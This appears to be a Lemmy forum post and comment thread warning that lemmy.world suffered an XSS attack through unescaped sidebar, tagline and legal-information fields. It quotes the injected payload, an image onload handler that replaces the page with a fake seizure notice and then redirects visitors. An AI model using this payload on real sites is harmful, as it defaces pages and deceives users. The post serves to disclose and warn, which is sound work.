this post was submitted on 10 Jul 2023
396 points (99.7% liked)

Lemmy

13138 readers
5 users here now

Everything about Lemmy; bugs, gripes, praises, and advocacy.

For discussion about the lemmy.ml instance, go to !meta@lemmy.ml.

founded 5 years ago
MODERATORS
 

DO NOT OPEN THE "LEGAL" PAGE


lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

EDIT 2:

The legal information field also has that exploit, so that when you go to the "Legal" page it shows the HTML unescaped, but fortunately (for now) he's using double-quotes.

"legal_information":" ![\" onload=\"if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `\u003Ch1\u003ESite has been seized by Reddit for copyright infringment\u003C\u002Fh1\u003E`; setTimeout(() =\u003E {window.location.href = `https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}\"](https:\u002F\u002Flemmy.world\u002Fpictrs\u002Fimage\u002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png \"lw\")
you are viewing a single comment's thread
view the rest of the comments
[–] crystal@feddit.de 0 points 2 years ago (1 children)

The reason it's perceived that way is because code injection in user input, is (one of) the most obvious, well-known, and easiest attacks to do, while at the same time being super easy to prevent.

[–] cyclohexane@lemmy.ml 2 points 2 years ago (1 children)

It is one of the most well known, but it also is easy to miss, evidently from how often it happens despite it being very well known.

It's very easy to fix once it's known, but it is easy to go unnoticed.

Unless you somehow think that most app developers are incompetent, in which case I ask again: show me your better version.

[–] crystal@feddit.de 1 points 2 years ago* (last edited 2 years ago) (1 children)

I can confidently say that in not a single company project I did frontend development for did I ever leave user input unsanitized.

But I did not ever create a Lemmy like project, that is true.

[–] cyclohexane@lemmy.ml 1 points 2 years ago

If you are doubting that this is one of the most frequently occurring security issues, I urge to search the web about it. It's very easy to verify my claim.